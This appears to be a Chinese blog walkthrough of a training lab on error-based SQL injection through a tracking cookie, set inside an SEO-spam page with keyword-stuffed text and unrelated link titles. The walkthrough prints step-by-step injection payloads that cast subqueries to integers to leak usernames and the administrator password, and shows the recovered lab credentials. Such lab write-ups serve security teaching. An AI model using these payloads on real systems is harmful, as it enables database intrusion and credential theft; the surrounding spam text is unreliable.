当前位置: 首页 > wzjs >正文

北京梦活力网站建设首页关键词排名优化

北京梦活力网站建设,首页关键词排名优化,vps里面设置了一下读取和写入网站无法显示了,一个app网站文章目录 前言:进入实验室构造 payload 前言: 实验室标题为: 基于可见错误的 SQL 注入 等级:执业者 简介: 本实验室包含 SQL 注入漏洞。应用程序使用跟踪 cookie 进行分析,并执行包含已提交 cookie 值…

文章目录

  • 前言:
  • 进入实验室
  • 构造 payload

前言:

实验室标题为:

基于可见错误的 SQL 注入

等级:执业者

简介:

本实验室包含 SQL 注入漏洞。应用程序使用跟踪 cookie 进行分析,并执行包含已提交 cookie 值的 SQL 查询。SQL 查询结果不会返回。

数据库包含一个名为users的不同表,其中有名为username和password的列。要解决这个实验问题,请想办法泄露管理员用户的密码,然后登录他们的账户。

进入实验室

依旧是一个商店页面

构造 payload

借助谷歌插件 EditThisCookie

输入单引号,页面显示报错

注意报错内容中显示了完整的 SQL 查询,包括 cookie 值;除此之外,还解释了有一个未闭合的字符串;需要额外注意的是注入内容出现在单引号字符串中。

输入单引号+注释符

9Dr386uz23LFIvjF' --

刷新页面,页面返回正常,表明在语法上是有效的

select 查询

9Dr386uz23LFIvjF' and cast((seect 1) as int) --

页面显示报错,报错显示存在语法错误

修改 payload

9Dr386uz23LFIvjF' and 1=cast((select 1) as int) --

页面返回正常,说明语法正确

查询用户名

9Dr386uz23LFIvjF' and 1=cast((select username from users) as int) --

页面显示报错,但是由于字符限制,报错显示并不完整

修改 payload,删除 cookie 值

' and 1=cast((select username from users) as int) --

页面依旧显示报错,报错内容显示返回多于一条记录

如果限制返回一行,是否就不会出现报错

' and 1=cast((select username from users limit 1) as int) --

报错中出现了 administrator

继续尝试能否报错出现密码

' and 1=cast((select password from users limit 1) as int) --

成功在爆破中得到密码

登录账号密码,成功通关

administrator

vai842k57z3l4lb0hgij

http://www.dtcms.com/wzjs/267189.html

相关文章:

  • 淮南网站建设价格seo入门基础教程
  • 钟表珠宝商城网站建设深圳优化公司统高粱seo
  • 网站组织结构图谷歌seo视频教程
  • 长春市防疫最新消息数据网站关键词优化的步骤和过程
  • 做国外网站衣服码数要怎么写可口可乐搜索引擎营销案例
  • 站长工具seo优化建议网站大全软件下载
  • 成都响应式网站网络营销与网站推广的区别
  • 如何做网站的薪酬调查餐饮培训
  • 北京建设银行公积金提取网站高中同步测控优化设计答案
  • 在线网站地图生成器系统优化大师下载
  • 中国有什么网站做跨境零售武汉seo首页
  • WordPress的黑色框谷歌外贸seo
  • 建站工具 开源为什么打开网址都是站长工具
  • 网站设计 优帮云百度搜索风云榜电脑版
  • 网站建设公司哪家强网络优化app哪个好
  • 国外推广网站有哪些114啦网址导航官网
  • 网站建设实训总结300青柠影院免费观看电视剧高清
  • 开封 网站建设百度友情链接
  • 做网站开通手机验证功能营销公司排行
  • 青岛手机建站哪家好steam交易链接怎么用
  • 如何提升网站打开速度软件优化
  • python编程网站爱战网关键词
  • 香港主机做福彩网站做一个私人网站需要多少钱
  • 网站开发流程简述seo课程简介
  • wordpress 获取标签id网站seo诊断报告
  • 乌兰察布网站制作西安百度推广优化公司
  • 网站优化怎么操作公司网址
  • 做外贸网站怎么访问外国网站湖南网络推广排名
  • 北京住房和城乡建设委员会网站公告安卓优化大师最新版下载
  • 创业策划书网站内部seo优化包括